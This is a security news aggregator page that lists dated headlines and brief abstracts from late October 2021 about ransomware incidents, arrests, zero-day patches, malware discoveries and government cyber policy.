October, 2021
October 31, 2021 – General
Microsoft warns of rise in password sprays targeting cloud accounts Full Text
Abstract
The Microsoft Detection and Response Team (DART) says it detected an increase in password spray attacks targeting privileged cloud accounts and high-profile identities such as C-level executives.BleepingComputer
October 31, 2021 – Criminals
TA575 is Using Squid Game Lures to Drop Dridex Full Text
Abstract
Proofpoint stumbled across a cybercrime actor, TA575, sending thousands of Squid Game phishing lures aimed at multiple industries primarily in the U.S. The group sends thousands of emails in every single campaign aimed at hundreds of organizations. Users are advised not to believe anything on the ... Read MoreCyware Alerts - Hacker News
October 31, 2021 – Breach
Iranian Black Shadow hacking group breached Israeli Internet hosting firm Full Text
Abstract
Irananian hacking group Black Shadow breached the Israeli internet hosting company Cyberserve, taking down several of its sites. Iranian hacking group Black Shadow compromised the server of the Israeli internet hosting company Cyberserve, taking...Security Affairs
October 31, 2021 – Malware
Rogue QR Codes Steal Microsoft Credentials and Crypto Funds Full Text
Abstract
Recently, researchers uncovered an email-based phishing scam containing QR codes in a bid to steal users’ Microsoft credentials and other data.Cyware Alerts - Hacker News
October 31, 2021 – Attack
Minecraft Japanese gamers hit by Chaos ransomware using alt lists as lure Full Text
Abstract
Chaos Ransomware operators target gamers' Windows devices using Minecraft alt lists as a lure and promoting them on gaming forums. Minecraft is one of the most popular games in the world, it had more than 140 million monthly active players in August...Security Affairs
October 31, 2021 – Attack
Graff multinational jeweller hit by Conti gang. Data of its rich clients are at risk, including Trump and Beckham Full Text
Abstract
Conti ransomware gang hit high society jeweller Graff and threatens to release private details of world leaders, actors and tycoons The latest attack of the Conti ransomware gang makes the headlines, the threat actors hit high society jeweller Graff...Security Affairs
October 31, 2021 – General
Security Affairs newsletter Round 338 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
October 30, 2021 – Policy and Law
Police Arrest Suspected Ransomware Hackers Behind 1,800 Attacks Worldwide Full Text
Abstract
12 people have been detained as part of an international law enforcement operation for orchestrating ransomware attacks on critical infrastructure and large organizations that hit over 1,800 victims across 71 countries since 2019, marking the latest action against cybercrime groups. The arrests were made earlier this week on October 26 in Ukraine and Switzerland, resulting in the seizure of cash worth $52,000, five luxury vehicles, and a number of electronic devices that the agencies said are being examined to uncover new forensic evidence of their malicious activities and pursue new investigative leads. The suspects have been primarily linked to LockerGoga, MegaCortex, and Dharma ransomware, in addition to being in charge of laundering the ransom payments by funneling the ill-gotten Bitcoin proceeds through mixing services and cashing them out. "The targeted suspects all had different roles in these professional, highly organised criminal organisations," Europol saidThe Hacker News
October 30, 2021 – Ransomware
Chaos ransomware targets gamers via fake Minecraft alt lists Full Text
Abstract
The Chaos Ransomware gang encrypts gamers' Windows devices through fake Minecraft alt lists promoted on gaming forums.BleepingComputer
October 30, 2021 – Attack
REvil and SolarMarker Employ SEO Poisoning Attacks Full Text
Abstract
Researchers highlight two separate campaigns dropping REvil and SolarMarker backdoors leveraging the SEO poisoning method to spread payloads in the systems of targeted victims.Cyware Alerts - Hacker News
October 30, 2021 – Vulnerabilities
War-Driving - Still an Easy Bet for Household Wi-Fi Attacks Full Text
Abstract
A researcher from CyberArk demonstrated how a cheap device can be exploited to break into over 70% of Wi-Fi networks in one Tel Aviv community. According to researchers , the sniffing technique used in the experiment only works with routers supporting roaming features. U sers should use complex p ... Read MoreCyware Alerts - Hacker News
October 30, 2021 – APT
Lazarus APT Group Enters the Supply Chain Attack Game Full Text
Abstract
Kaspersky revealed two separate supply chain attacks by Lazarus Group aimed at an IT asset monitoring solution vendor, a South Korean think tank, and the defense industry. H ackers use a Racket downloader (signed with a stolen certificate) in the infection chain. O rganizations must stay alert and ... Read MoreCyware Alerts - Hacker News
October 30, 2021 – Breach
Hacker accessed medical info at UMass Memorial Health Full Text
Abstract
A cyber attack hit the UMass Memorial Health, threat actors had access to employee email system, potentially exposing patients info. Threat actors hacked into the employee email system of the UMass Memorial Health healthcare system, potentially accessing...Security Affairs
October 30, 2021 – Vulnerabilities
Chrome 95 Update Patches Exploited Zero-Days, Flaws Disclosed at Tianfu Cup Full Text
Abstract
A Chrome 95 update released by Google patches two actively exploited Chrome vulnerabilities, as well as flaws that were disclosed recently at Tianfu Cup, a Chinese hacking contest.Security Week
October 30, 2021 – General
Reading INTERPOL the African Cyberthreat Assessment Report 2021 Full Text
Abstract
INTERPOL published the African Cyberthreat Assessment Report 2021, a report that analyzes evolution of cybercrime in Africa. A new report published by INTERPOL, titled the African Cyberthreat Assessment Report 2021, sheds the light on cybercrime...Security Affairs
October 30, 2021 – Attack
Ransomware Attack Hits PNG Finance Ministry Full Text
Abstract
Ransomware infiltrated and compromised a core server at the department of finance last week, hampering the government's access to foreign aid, its ability to pay cheques, and carry out other basic functions in the midst of a spiraling Covid-19 surge.Security Week
October 30, 2021 – Government
MITRE and CISA publish the 2021 list of most common hardware weaknesses Full Text
Abstract
MITRE and CISA announced the release of the “2021 Common Weakness Enumeration (CWE) Most Important Hardware Weaknesses” list. MITRE and the DHS’s Cybersecurity and Infrastructure Security Agency (CISA) have announced the release of the “2021...Security Affairs
October 30, 2021 – Policy and Law
Police sting targets suspects behind 1,800 attacks that ‘wreaked havoc across the world’ Full Text
Abstract
Twelve people have been targeted by an international law enforcement operation for involvement in over 1,800 ransomware attacks on critical infrastructure and large organizations around the world.ZDNet
October 30, 2021 – Botnet
TrickBot member extradited to US faces up to 60 years in prison Full Text
Abstract
An alleged member of the TrickBot gang, the Russian national Vladimir Dunaev (aka FFX), has been extradited to the US. Vladimir Dunaev (38), a Russian national suspected to be a member of the infamous TrickBot gang, has been extradited to the U.S....Security Affairs
October 30, 2021 – Vulnerabilities
Apple fixes security feature bypass in macOS Full Text
Abstract
Apple has delivered a barrage of updates for most of its devices this week, and among the vulnerabilities fixed are CVE-2021-30892, a System Integrity Protection bypass in macOS, and CVE-2021-30883, an iOS flaw that’s actively exploited by attackers.Help Net Security
October 29, 2021 – Government
Federal push to identify, protect critical groups from hackers gains momentum Full Text
Abstract
Efforts in the federal government and Congress to identify and further protect groups critical to national security from cyber threats are gaining ground amid recent destructive ransomware attacks, officials say.The Hill
October 29, 2021 – Malware
This New Android Malware Can Gain Root Access to Your Smartphones Full Text
Abstract
An unidentified threat actor has been linked to a new Android malware strain that features the ability to root smartphones and take complete control over infected smartphones while simultaneously taking steps to evade detection. The malware has been named " AbstractEmu " owing to its use of code abstraction and anti-emulation checks undertaken to thwart analysis right from the moment the apps are opened. Notably, the global mobile campaign is engineered to target and infect as many devices as possible indiscriminately. Lookout Threat Labs said it found a total of 19 Android applications that posed as utility apps and system tools like password managers, money managers, app launchers, and data saving apps, seven of which contained the rooting functionality. Only one of the rogue apps, called Lite Launcher, made its way to the official Google Play Store, attracting a total of 10,000 downloads before it was purged. The apps are said to have been prominently distributed viaThe Hacker News
October 29, 2021 – General
The Week in Ransomware - October 29th 2021 - Making arrests Full Text
Abstract
This week, international law enforcement operations went on the offensive, making arrests in numerous countries for ransomware-related activities.BleepingComputer
October 29, 2021 – Vulnerabilities
New ‘Shrootless’ Bug Could Let Attackers Install Rootkit on macOS Systems Full Text
Abstract
Microsoft on Thursday disclosed details of a new vulnerability that could allow an attacker to bypass security restrictions in macOS and take complete control of the device to perform arbitrary operations on the device without getting flagged by traditional security solutions. Dubbed " Shrootless " and tracked as CVE-2021-30892 , the "vulnerability lies in how Apple-signed packages with post-install scripts are installed," Microsoft 365 Defender Research Team's Jonathan Bar Or said in a technical write-up. "A malicious actor could create a specially crafted file that would hijack the installation process." System Integrity Protection ( SIP ) aka "rootless" is a security feature introduced in OS X El Capitan that's designed to protect the macOS operating system by restricting a root user from executing unauthorized code or performing operations that may compromise system integrity. Specifically, SIP allows modification of proteThe Hacker News
October 29, 2021 – Malware
Snake malware biting hard on 50 apps for only $25 Full Text
Abstract
Cybercriminals are flooding to use the Snake password-stealing trojan, making it one of the popular malware families used in attacks.BleepingComputer
October 29, 2021 – General
Winter is Coming for CentOS 8 Full Text
Abstract
Winter is Coming for CentOS 8—but here is how you can enjoy your holidays after all. The server environment is complex and if you're managing thousands of Linux servers, the last thing you want is for an operating system vendor to do something completely unexpected. That is exactly what Red Hat, the parent company of the CentOS Project, did when it suddenly announced a curtailment of support for CentOS 8 – sending thousands of organizations scrambling for an alternative. In this article, we'll review what happened with CentOS 8 and what it means for users who have already upgraded from CentOS release 7 to release 8. We'll also look at your alternatives for replacing CentOS 8. Finally, we'll do a review of your other option: choosing extended support. Extended lifecycle support (ELS) can reduce the pressure to decide on alternative distribution and it may well be the most practical route for many CentOS 8 users. Official support is critical The difficulties arouThe Hacker News
October 29, 2021 – Ransomware
Hive ransomware now encrypts Linux and FreeBSD systems Full Text
Abstract
The Hive ransomware gang now also encrypts Linux and FreeBSD using new malware variants specifically developed to target these platforms.BleepingComputer
October 29, 2021 – Policy and Law
DOJ: Pirated sports streamer hacked accounts, extorted MLB Full Text
Abstract
The U.S. Attorney's Office for the Southern District of New York has charged a man for illegally streaming MLB, NBA, NFL, and NHL games via the web and hacking into sports leagues' customer accounts.BleepingComputer
October 29, 2021 – Solution
Microsoft: Windows web content filtering now generally available Full Text
Abstract
Microsoft has announced that web content filtering has reached general availability and is now available for all Windows enterprise customers.BleepingComputer
October 29, 2021 – Vulnerabilities
Google Chromebooks failing to enroll due to network issue Full Text
Abstract
Since Thursday evening, Google has been investigating reports of customers having issues enrolling their Chromebooks with a network error.BleepingComputer
October 29, 2021 – Criminals
Police arrest hackers behind over 1,800 ransomware attacks Full Text
Abstract
The Europol has announced the arrest of 12 individuals who are believed to be linked to ransomware attacks against 1,800 victims in 71 countries.BleepingComputer
October 29, 2021 – Ransomware
ESET found a variant of the Hive ransomware that encrypts Linux and FreeBSD Full Text
Abstract
The Hive ransomware operators have developed a new variant of their malware that can encrypt Linux and FreeBSD. ESET researchers discovered a new Hive ransomware variant that was specifically developed to encrypt Linux and FreeBSD. Researchers at the cybersecurity...Security Affairs
October 29, 2021 – Attack
Papua New Guinea ‘s finance ministry was hit by a ransomware Full Text
Abstract
A ransomware attack hit Papua New Guinea 's finance ministry and disrupted government payments and operations. Government officials confirmed that Papua New Guinea's finance ministry was hit by a ransomware attack that disrupted government payments...Security Affairs
October 29, 2021 – Criminals
Russian TrickBot Gang Hacker Extradited to U.S. Charged with Cybercrime Full Text
Abstract
A Russian national, who was arrested in South Korea last month and extradited to the U.S. on October 20, appeared in a federal court in the state of Ohio on Thursday to face charges for his alleged role as a member of the infamous TrickBot group. Court documents showed that Vladimir Dunaev , 28, along with other members of the transnational, cybercriminal organization, stole money and confidential information from unsuspecting victims, including individuals, financial institutions, school districts, utility companies, government entities, and private businesses. Starting its roots as a banking trojan in 2016, TrickBot has evolved into a modular, multi-stage Windows-based crimeware solution capable of pilfering valuable personal and financial information, and even dropping ransomware and post-exploitation toolkits on compromised devices. The malware is also notorious for its resilience , having survived at least two takedowns spearheaded by Microsoft and the U.S. Cyber CommandThe Hacker News
October 29, 2021 – Vulnerabilities
Google fixes 2 new actively exploited zero-day flaws in Chrome Full Text
Abstract
Google has released Chrome 95.0.4638.69 for Windows, Mac, and Linux to address two actively exploited zero-day vulnerabilities. Google has released Chrome 95.0.4638.69 for Windows, Mac, and Linux to address two zero-day vulnerabilities, tracked as CVE-2021-38000...Security Affairs
October 28, 2021 – Vulnerabilities
Google Releases Urgent Chrome Update to Patch 2 Actively Exploited 0-Day Bugs Full Text
Abstract
Google on Thursday rolled out an emergency update for its Chrome web browser, including fixes for two zero-day vulnerabilities that it says are being actively exploited in the wild. Tracked as CVE-2021-38000 and CVE-2021-38003 , the weaknesses relate to insufficient validation of untrusted input in a feature called Intents as well as a case of inappropriate implementation in V8 JavaScript and WebAssembly engine. The internet giant's Threat Analysis Group (TAG) has been credited with discovering and reporting the two flaws on September 15, 2021, and October 26, 2021, respectively. "Google is aware that exploits for CVE-2021-38000 and CVE-2021-38003 exist in the wild," the company noted in an advisory without delving into technical specifics about how the two vulnerabilities were used in attacks or the threat actors that may have weaponized them. Also addressed as part of this stable channel update is a use-after-free vulnerability in the Web Transport componentThe Hacker News
October 28, 2021 – Malware
TrickBot malware dev extradited to U.S. faces 60 years in prison Full Text
Abstract
A Russian national believed to be a member of the TrickBot malware development team has been extradited to the U.S. and is currently facing charges that could get him 60 years in prison.BleepingComputer
October 28, 2021 – Vulnerabilities
Emergency Google Chrome update fixes zero-days used in attacks Full Text
Abstract
Google has released Chrome 95.0.4638.69 for Windows, Mac, and Linux to fix two zero-day vulnerabilities that attackers have actively exploited.BleepingComputer
October 28, 2021 – Attack
UltimaSMS Victimizes Millions in Fraud Campaign Full Text
Abstract
A fraud campaign, dubbed UltimaSMS, is signing up users to premium SMS subscription services without their consent and knowledge. Promoted mostly via Instagram and TikTok, these Android apps have over 10.5 million downloads and involve at least 151 malicious apps. Stay cautious!Cyware Alerts - Hacker News
October 28, 2021 – Government
Senate approves bill to protect telecommunications infrastructure from foreign threats Full Text
Abstract
The Senate on Thursday unanimously passed legislation to take steps to further crack down on the use of telecommunications products from companies deemed to be a national security threat, such as those based in China.The Hill
October 28, 2021 – Hacker
Israeli Researcher Cracked Over 3500 Wi-Fi Networks in Tel Aviv City Full Text
Abstract
Over 70% of Wi-Fi networks from a sample size of 5,000 were hacked with "relative ease" in the Israeli city of Tel Aviv, highlighting how unsecure Wi-Fi passwords can become a gateway for serious threats to individuals, small businesses, and enterprises alike. CyberArk security researcher Ido Hoorvitch, who used a Wi-Fi sniffing equipment costing about $50 to collect 5,000 network hashes for the study, said "the process of sniffing Wi-Fis and the subsequent cracking procedures was a very accessible undertaking in terms of equipment, costs and execution." The new Wi-Fi attack builds on previous findings by Jens "atom" Steube in 2018 that involves capturing what's called the PMKIDs associated with a client (aka SSID) in order to attempt a brute-force attack using password recovery tools like hashcat. PMKID is a unique key identifier used by the access point (AP) to keep track of the pre-shared key — i.e., pairwise master key aka PMK — being uThe Hacker News
October 28, 2021 – Vulnerabilities
Microsoft found Shrootless bug in macOS that could bypass System Integrity Protection Full Text
Abstract
Microsoft finds a flaw in macOS, dubbed Shrootless (CVE-2021-30892), that can allow attackers to bypass System Integrity Protection (SIP). Microsoft discovered a vulnerability in macOS, dubbed Shrootless (CVE-2021-30892), that can allow attackers...Security Affairs
October 28, 2021 – Vulnerabilities
All Windows versions impacted by new LPE zero-day vulnerability Full Text
Abstract
A security researcher has disclosed technical details for a Windows zero-day privilege elevation vulnerability and a public proof-of-concept (PoC) exploit that gives SYSTEM privileges under certain conditions.BleepingComputer
October 28, 2021 – Vulnerabilities
Attackers Targeting a Zero-Day Bug in BillQuick Billing System Full Text
Abstract
Researchers have disclosed details about a now-patched critical vulnerability in a time and billing system called BillQuick that was being by a new ransomware group. It can be triggered simply by using login requests with invalid characters in the username field. It's recommended to apply the ... Read MoreCyware Alerts - Hacker News
October 28, 2021 – Hacker
Alleged Russian hacker extradited from South Korea to stand trial in US Full Text
Abstract
An alleged Russian hacker appeared in court for the first time Thursday to face allegations that he played a role in a transnational cybercrime organization after being extradited to the United States from South Korea.The Hill
October 28, 2021 – Education
A Guide to Shift Away from Legacy Authentication Protocols in Microsoft 365 Full Text
Abstract
Microsoft 365 (M365), formerly called Office 365 (O365), is Microsoft's cloud strategy flagship product with major changes ahead, such as the deprecation of their legacy authentication protocols. Often stored on or saved to the device, Basic Authentication protocols rely on sending usernames and passwords with every request, increasing the risk of attackers capturing users' credentials, particularly if not TLS protected. Basic Authentication, while necessary for companies using legacy software, is unable to enforce MFA and is superseded by Modern Authentication. The legacy settings have been on Microsoft's radar to fix for years. In 2018, Microsoft announced it would introduce a series of changes — and ultimately deprecation — to its authentication controls as a means to help organizations mitigate the risk. These changes were set to take place over a number of years, and in September 2021, they announced that they will begin to permanently disable Basic Auth in allThe Hacker News
October 28, 2021 – Vulnerabilities
Over 1 million WordPress sites affected by OptinMonster plugin flaws Full Text
Abstract
A vulnerability in the popular the OptinMonster plugin allows unauthorized API access and sensitive information disclosure. A high-severity vulnerability (CVE-2021-39341) in The OptinMonster plugin can allow unauthorized API access and sensitive...Security Affairs
October 28, 2021 – Government
NSA and CISA share guidance on securing 5G cloud infrastructure Full Text
Abstract
CISA and the NSA shared guidance on securing cloud-native 5G networks from attacks seeking to compromise information or deny access by taking down cloud infrastructure.BleepingComputer
October 28, 2021 – Government
Beware of Ranzy Locker Ransomware: FBI Warns Full Text
Abstract
According to an FBI alert, Ranzy Locker ransomware operators crippled the networks of at least 30 U.S. organizations, mostly via brute-force attacks. The group runs a double extortion model, threatening victims to leak data if they did not agree with ransom demands. The alert by officials of ... Read MoreCyware Alerts - Hacker News
October 28, 2021 – Government
Warner says cyber threats more worrying than ‘traditional weaponry’ Full Text
Abstract
Sen. Mark Warner (D-Va.), said Thursday that cyberattacks pose larger risks than conventional warfare, citing the recent SolarWinds and Colonial Pipeline hacks as examples of a “dramatically” different security environment that has taken shape over the past decade.The Hill
October 28, 2021 – Malware
New Wslink Malware Loader Runs as a Server and Executes Modules in Memory Full Text
Abstract
Cybersecurity researchers on Wednesday took the wraps off a "simple yet remarkable" malware loader for malicious Windows binaries targeting Central Europe, North America and the Middle East. Codenamed " Wslink " by ESET, this previously undocumented malware stands apart from the rest in that it runs as a server and executes received modules in memory. There are no specifics available on the initial compromise vector and there are no code or operational overlaps that tie this tool to a known threat actor group. The Slovak cybersecurity firm noted that it has seen only a handful of detections in the past two years, suggesting that it could be used in highly-targeted cyber infiltrations. Wslink is designed to run as a service and can accept encrypted portal executable (PE) files from a specific IP address, which is then decrypted and loaded into memory prior to the execution. To achieve this, the client (i.e., the victim) and the server perform a handshake that inThe Hacker News
October 28, 2021 – Malware
Wslink, a previously undescribed loader for Windows binaries Full Text
Abstract
ESET researchers discovered a previously undescribed loader for Windows binaries, tracked as Wslink, that runs as a server and executes modules in memory. ESET researchers discovered Wslink, a previously undescribed loader for Windows binaries that,...Security Affairs
October 28, 2021 – Vulnerabilities
Microsoft: Shrootless bug lets hackers install macOS rootkits Full Text
Abstract
Attackers could use a new macOS vulnerability discovered by Microsoft to bypass System Integrity Protection (SIP) and perform arbitrary operations, elevate privileges to root, and install rootkits on vulnerable devices.BleepingComputer
October 28, 2021 – Business
Dragos Becomes First Industrial Cybersecurity Unicorn After Raising $200 Million Full Text
Abstract
The latest funding, which brings the total raised by Dragos to roughly $360 million, was led by Koch Disruptive Technologies and funds and accounts managed by BlackRock. Several other investors also took part in this round.Security Week
October 28, 2021 – Government
Biden administration officials outline steps to tackle urgent cyber threats Full Text
Abstract
Top Biden administration officials on Thursday outlined steps taken to confront the increase in cyber threats against the nation, including through strengthening key critical infrastructure groups.The Hill
October 28, 2021 – Malware
Malicious NPM Libraries Caught Installing Password Stealer and Ransomware Full Text
Abstract
Malicious actors have yet again published two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, with the goal of distributing stealing credentials, installing remote access trojans, and infecting the compromised systems with ransomware. The bogus packages — named " noblox.js-proxy " and " noblox.js-proxies " — were found to impersonate a library called " noblox.js ," a Roblox game API wrapper available on NPM and boasts of nearly 20,000 weekly downloads, with each of the poisoned libraries, downloaded a total of 281 and 106 times respectively. According to Sonatype researcher Juan Aguirre, who discovered the malicious NPM packages, the author of noblox.js-proxy first published a benign version that was later tampered with the obfuscated text, in reality, a Batch (.bat) script, in the post-installation JavaScript file. This Batch script, in turn, downloads malicious executablesThe Hacker News
October 28, 2021 – Malware
AbstractEmu, a new Android malware with rooting capabilities Full Text
Abstract
AbstractEmu is a new Android malware that can root infected devices to take complete control and evade detection with different tricks. Security researchers at the Lookout Threat Labs have discovered a new Android malware, dubbed AbstractEmu,...Security Affairs
October 28, 2021 – Privacy
Android spyware spreading as antivirus software in Japan Full Text
Abstract
A new variant of the Android info-stealer called FakeCop has been spotted by Japanese security researchers, who warn that the distribution of the malicious APK is picking up pace.BleepingComputer
October 28, 2021 – Education
Microsoft investing millions in community colleges to strengthen cyber workforce Full Text
Abstract
Microsoft on Thursday announced a new campaign to invest millions of dollars and resources in community colleges in an effort to address the massive shortage of American workers to fill cybersecurity positions.The Hill
October 28, 2021 – Cryptocurrency
German investigators identify crypto millionaire behind REvil operations Full Text
Abstract
German authorities have identified a Russian man named Nikolay K. who is suspected to be a prominent member of the REvil ransomware gang. REvil ransomware gang is one of the most successful ransomware operations, the group and its affiliated hit hundreds...Security Affairs
October 28, 2021 – Vulnerabilities
WordPress plugin bug impacts 1M sites, allows malicious redirects Full Text
Abstract
The OptinMonster plugin is affected by a high-severity flaw that allows unauthorized API access and sensitive information disclosure on roughly a million WordPress sites.BleepingComputer
October 28, 2021 – Breach
Crooks steal $130 million worth of cryptocurrency assets from Cream Finance Full Text
Abstract
Threat actors have stolen $130 million worth of cryptocurrency assets from the Cream Finance decentralized finance (DeFi) platform. C.R.E.A.M. Finance is a decentralized lending protocol for individuals, institutions and protocols to access financial...Security Affairs
October 28, 2021 – Malware
New AbstractEmu malware roots Android devices, evades detection Full Text
Abstract
New Android malware can root infected devices to take complete control and silently tweak system settings, as well as evade detection using code abstraction and anti-emulation checks.BleepingComputer
October 28, 2021 – Criminals
Ransomware gangs use SEO poisoning to infect visitors Full Text
Abstract
Researchers have spotted two campaigns linked to either the REvil ransomware gang or the SolarMarker backdoor that use SEO poisoning to serve payloads to targets.BleepingComputer
October 28, 2021 – Criminals
German investigators identify REvil ransomware gang core member Full Text
Abstract
German investigators have reportedly identified a Russian man named Nikolay K. whom they believe to be one of REvil ransomware gang's core members, one of the most notorious and successful ransomware groups in recent years.BleepingComputer
October 28, 2021 – Government
EU investigating leak of private key used to forge Covid passes Full Text
Abstract
The private key used to sign EU Digital Covid certificates has been reportedly leaked and is being circulated on messaging apps and forums. The key has also been misused to generate forged certificates, such as those for Adolf Hitler, Mickey Mouse, Sponge Bob—all of which are being recognized as valid by the official government apps.BleepingComputer
October 28, 2021 – Breach
Sensitive data of 400,000 German students exposed by API flaw Full Text
Abstract
Approximately 400,000 users of Scoolio, a student community app widely used in Germany, had sensitive information exposed due to an API flaw in the platform.BleepingComputer
October 27, 2021 – Vulnerabilities
WordPress Plugin Bug Lets Subscribers Wipe Sites Full Text
Abstract
The flaw, found in the Hashthemes Demo Importer plugin, allows any authenticated user to exsanguinate a vulnerable WordPress site, deleting nearly all database content and uploaded media.Threatpost
October 27, 2021 – Phishing
Teen Rakes in $2.74M Worth of Bitcoin in Phishing Scam Full Text
Abstract
The kid was busted after abusing Google Ads to lure users to his fake gift card site.Threatpost
October 27, 2021 – Vulnerabilities
Adobe’s Surprise Security Bulletin Dominated by Critical Patches Full Text
Abstract
Out of 92 security vulnerabilities, 66 are rated critical in severity, mostly allowing code execution. The most severe can lead to information disclosure.Threatpost
October 27, 2021 – Criminals
NRA: No comment on Russian ransomware gang attack claims Full Text
Abstract
The Grief ransomware gang claims to have attacked the National Rifle Association (NRA) and released allegedly stolen data as proof of the attack.BleepingComputer
October 27, 2021 – General
Natural Disasters Can Set the Stage for Cyberattacks Full Text
Abstract
Cybercriminals, who are becoming increasingly sophisticated, could take advantage of natural disasters such as hurricanes, wildfires, and tornadoes to wreak havoc on critical infrastructure.Nextgov
October 27, 2021 – Attack
NRA hit by Russian-linked ransomware attack: reports Full Text
Abstract
The National Rifle Association (NRA) has been hit by a ransomware attack, becoming the latest victim of a massive spike in these attacks this year, according to multiple reports Wednesday.The Hill
October 27, 2021 – Malware
Hackers Using Squirrelwaffle Loader to Deploy Qakbot and Cobalt Strike Full Text
Abstract
A new spam email campaign has emerged as a conduit for a previously undocumented malware loader that enables the attackers to gain an initial foothold into enterprise networks and drop malicious payloads on compromised systems. "These infections are also used to facilitate the delivery of additional malware such as Qakbot and Cobalt Strike, two of the most common threats regularly observed targeting organizations around the world," said researchers with Cisco Talos in a technical write-up. The malspam campaign is believed to have commenced in mid-September 2021 via laced Microsoft Office documents that, when opened, triggers an infection chain that leads to the machines getting infected with a malware dubbed SQUIRRELWAFFLE . Mirroring a technique that's consistent with other phishing attacks of this kind, the latest operation leverages stolen email threads to give it a veil of legitimacy and trick unsuspecting users into opening the attachments. What's more, tThe Hacker News
October 27, 2021 – Ransomware
Avast releases free decrypters for AtomSilo and LockFile ransomware families Full Text
Abstract
Security firm Avast released today decryptors for AtomSilo and LockFile ransomware that allow victims to recover their files for free. Cyber security firm Avast has released today decryption utilities for AtomSilo and LockFile ransomware that allow...Security Affairs
October 27, 2021 – Education
Ransomware Attacks Are Evolving. Your Security Strategy Should, Too Full Text
Abstract
Defending against ransomware will take a move to zero-trust, argues Daniel Spicer, CSO, Ivanti.Threatpost
October 27, 2021 – Privacy
Android spyware apps target Israel in three-year-long campaign Full Text
Abstract
A set of seemingly innocuous Android apps have been infecting Israeli users with spyware since 2018, and the campaign continues to this day.BleepingComputer
October 27, 2021 – Hacker
TA551 Using Silver Red-Teaming Tool to Penetrate Networks Full Text
Abstract
TA551 has been found targeting victims by email thread hijacking using a red-teaming toolkit and adversary simulation framework called Sliver. Experts revealed that the attackers have been using this technique since October 20. The use of open-source pentest tools is becoming more popular ... Read MoreCyware Alerts - Hacker News
October 27, 2021 – Government
Blinken formally announces new State Department cyber bureau Full Text
Abstract
Secretary of State Antony Blinken on Wednesday formally announced the establishment of a new cyber bureau at the State Department to help tackle cyber and emerging technology diplomatic issues.The Hill
October 27, 2021 – Education
[eBook] The Guide to Centralized Log Management for Lean IT Security Teams Full Text
Abstract
One of the side effects of today's cyber security landscape is the overwhelming volume of data security teams must aggregate and parse. Lean security teams don't have it any easier, and the problem is compounded if they must do it manually. Data and log management are essential for organizations to gain real-time transparency and visibility into security events. XDR provider Cynet has offered up a new guide ( read it here ) that helps lean organizations understand the importance of centralized log management (CLM). The truth is that even the most well-stocked and staffed teams would have trouble manually handling their log management needs, which is why organizations are increasingly going the automated route. On top of the efficiency of automation, CLM gives organizations much greater visibility into their environment and security events that impact them. However, the benefits of deploying CLM tools and reducing the level of human intervention in log management and analysis are mThe Hacker News
October 27, 2021 – Criminals
Grief ransomware gang hit US National Rifle Association (NRA) Full Text
Abstract
Grief ransomware operators claim to have compromised computer systems at US National Rifle Association (NRA) and added it to their leak site. Grief ransomware operators announced to have hacked US National Rifle Association (NRA) and threaten to leak...Security Affairs
October 27, 2021 – Vulnerabilities
War-Driving Technique Allows Wi-Fi Password-Cracking at Scale Full Text
Abstract
A researcher was able to crack 70 percent of the gathered hashes in an experiment in a residential neighborhood.Threatpost
October 27, 2021 – Ransomware
Free decryptor released for Atom Silo and LockFile ransomware Full Text
Abstract
Avast has just released a decryption tool that will help AtomSilo and LockFile ransomware victims recover some of their files for free, without having to pay a ransom.BleepingComputer
October 27, 2021 – Attack
Abuse of Discord CDN Witnesses Significant Rise Full Text
Abstract
A recent investigation conducted by RiskIQ revealed that threat actors abused the Discord channel to deliver a total of 27 unique malware families. This included backdoors, password stealers, spyware, and trojans.Cyware Alerts - Hacker News
October 27, 2021 – Government
Lawmakers split on next steps to secure transportation sectors against hackers Full Text
Abstract
Lawmakers are split on the next steps that should be taking to secure key transportation avenues like air and rail against cyber threats.The Hill
October 27, 2021 – Outage
Cyber Attack in Iran Reportedly Cripples Gas Stations Across the Country Full Text
Abstract
A cyber attack in Iran left petrol stations across the country crippled, disrupting fuel sales and defacing electronic billboards to display messages challenging the regime's ability to distribute gasoline. Posts and videos circulated on social media showed messages that said, "Khamenei! Where is our gas?" — a reference to the country's supreme leader Ayatollah Ali Khamenei. Other signs read, "Free gas in Jamaran gas station," with gas pumps showing the words "cyberattack 64411" when attempting to purchase fuel, semi-official Iranian Students' News Agency (ISNA) news agency reported . Abolhassan Firouzabadi, the head of Iran's Supreme Cyberspace Council, said the attacks were "probably" state-sponsored but added it was too early to determine which country carried out the intrusions. Although no country or group has so far claimed responsibility for the incident, the attacks mark the second time digital billboards haveThe Hacker News
October 27, 2021 – Ransomware
Avast released a free decryptor for Babuk ransomware Full Text
Abstract
Researchers from cybersecurity firm Avast released a decryption tool for Babuk ransomware that allows victims to recover their files for free. Cybersecurity firm Avast has released a decryption tool for Babuk ransomware that allows victims to recover...Security Affairs
October 27, 2021 – Vulnerabilities
Apple Patches Critical iOS Bugs; One Under Attack Full Text
Abstract
Researchers found that one critical flaw in question is exploitable from the browser, allowing watering-hole attacks.Threatpost
October 27, 2021 – Business
Twitter employees required to use security keys after 2020 hack Full Text
Abstract
Twitter rolled out security keys to its entire workforce and made two-factor authentication (2FA) mandatory for accessing internal systems following last year's hack.BleepingComputer
October 27, 2021 – General
Nearly all US execs have experienced a cybersecurity threat, but some say there’s still no plan Full Text
Abstract
A new survey by Deloitte suggests the majority of US executives have encountered a cybersecurity incident but this has not translated into the creation of incident response plans.ZDNet
October 27, 2021 – Attack
Latest Report Uncovers Supply Chain Attacks by North Korean Hackers Full Text
Abstract
Lazarus Group, the advanced persistent threat (APT) group attributed to the North Korean government, has been observed waging two separate supply chain attack campaigns as a means to gain a foothold into corporate networks and target a wide range of downstream entities. The latest intelligence-gathering operation involved the use of MATA malware framework as well as backdoors dubbed BLINDINGCAN and COPPERHEDGE to attack the defense industry, an IT asset monitoring solution vendor based in Latvia, and a think tank located in South Korea, according to a new Q3 2021 APT Trends report published by Kaspersky. In one instance, the supply-chain attack originated from an infection chain that stemmed from legitimate South Korean security software running a malicious payload, leading to the deployment of the BLINDINGCAN and COPPERHEDGE malware on the think tank's network in June 2021. The other attack on the Latvian company in May is an "atypical victim" for Lazarus, theThe Hacker News
October 27, 2021 – General
The 9th edition of the ENISA Threat Landscape (ETL) report is out! Full Text
Abstract
